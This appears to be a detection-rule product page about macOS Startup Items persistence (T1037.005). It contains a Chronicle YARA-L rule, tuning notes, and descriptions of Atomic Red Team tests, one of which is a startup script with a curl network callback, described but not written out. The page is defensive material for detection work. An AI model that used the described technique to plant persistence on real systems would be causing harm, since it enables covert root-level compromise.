Detect Startup Items in Google Chronicle
Adversaries may use startup items automatically executed at boot initialization to establish persistence on macOS systems. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information (StartupParameters.plist) used by the system to determine execution order. Although technically deprecated in favor of Launch Daemons, the /Library/StartupItems directory may still exist on systems. An adversary can create the appropriate folders and files in the StartupItems directory to register their own persistence mechanism that executes as root during system boot.
MITRE ATT&CK
- Tactic
- Persistence Privilege Escalation
- Sub-technique
- T1037.005 Startup Items
- Canonical reference
- https://attack.mitre.org/techniques/T1037/005/
YARA-L Detection Query
rule t1037_005_macos_startup_items_persistence {
meta:
author = "Argus Detection Engineering"
description = "Detects creation or modification of files in /Library/StartupItems or StartupParameters.plist, indicating macOS startup item persistence (T1037.005)"
mitre_attack_technique = "T1037.005"
mitre_attack_tactic = "Persistence"
severity = "HIGH"
platform = "macOS"
reference = "https://attack.mitre.org/techniques/T1037/005/"
events:
(
$e.metadata.event_type = "FILE_CREATION" or
$e.metadata.event_type = "FILE_MODIFICATION" or
$e.metadata.event_type = "PROCESS_LAUNCH"
)
(
re.regex($e.target.file.full_path, `/Library/StartupItems/`) or
re.regex($e.target.process.command_line, `/Library/StartupItems`) or
re.regex($e.target.file.full_path, `StartupParameters\.plist`) or
re.regex($e.target.process.command_line, `StartupParameters\.plist`)
)
$e.principal.hostname = $hostname
condition:
$e
}Chronicle YARA-L 2.0 rule detecting macOS startup item persistence through UDM-normalized FILE_CREATION, FILE_MODIFICATION, and PROCESS_LAUNCH events referencing /Library/StartupItems or StartupParameters.plist. Anchors on hostname for grouping and alert context.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate macOS system management tools or older commercial software that still interacts with /Library/StartupItems as part of installation or service registration
- Security assessment tools conducting authorized persistence enumeration or red team exercises on macOS endpoints ingested into Chronicle
- IT provisioning automation that cleans up or documents legacy startup items during macOS fleet upgrades, generating file access events against the StartupItems path
Other platforms for T1037.005
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Create Malicious Startup Item Directory and Plist
Expected signal: File creation events for /Library/StartupItems/AtomicTestItem/ (directory), /Library/StartupItems/AtomicTestItem/AtomicTestItem (shell script), and /Library/StartupItems/AtomicTestItem/StartupParameters.plist. Process creation events for mkdir, bash, chmod with command lines referencing /Library/StartupItems. macOS Unified Log entries for sudo usage. MDE DeviceFileEvents with FolderPath containing /Library/StartupItems and FileName=StartupParameters.plist.
- Test 2Deploy Startup Item with Network Callback Script
Expected signal: File creation events for /Library/StartupItems/UpdateHelper/ directory and contents. Process creation events for mkdir, bash, chmod with /Library/StartupItems path. The shell script content will contain 'curl' and a network callback URL visible in file content telemetry. Spotlight metadata (kMDItemWhereFroms) will be absent since file was created locally. MDE DeviceFileEvents entries for both the executable and StartupParameters.plist.
- Test 3Simulate Startup Item Execution via Shell
Expected signal: Process creation events: sudo, bash, and the AtomicExecTest script executing with root privileges. The FolderPath /Library/StartupItems/AtomicExecTest/ appears in both file creation and process execution events. The id and echo commands run as root (uid=0) are visible in child process telemetry. MDE DeviceProcessEvents entries show InitiatingProcessFileName=bash with FolderPath containing /Library/StartupItems.
References (8)
- https://attack.mitre.org/techniques/T1037/005/
- https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
- https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- https://objective-see.org/blog.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md
- https://www.kaspersky.com/blog/adwind-rat/11430/
- https://support.apple.com/guide/deployment/startup-items-dep7b3ee4a0e/web
- https://www.jamf.com/blog/how-malware-persists-on-macos/
Unlock Pro Content
Get the full detection package for T1037.005 including response playbook, investigation guide, and atomic red team tests.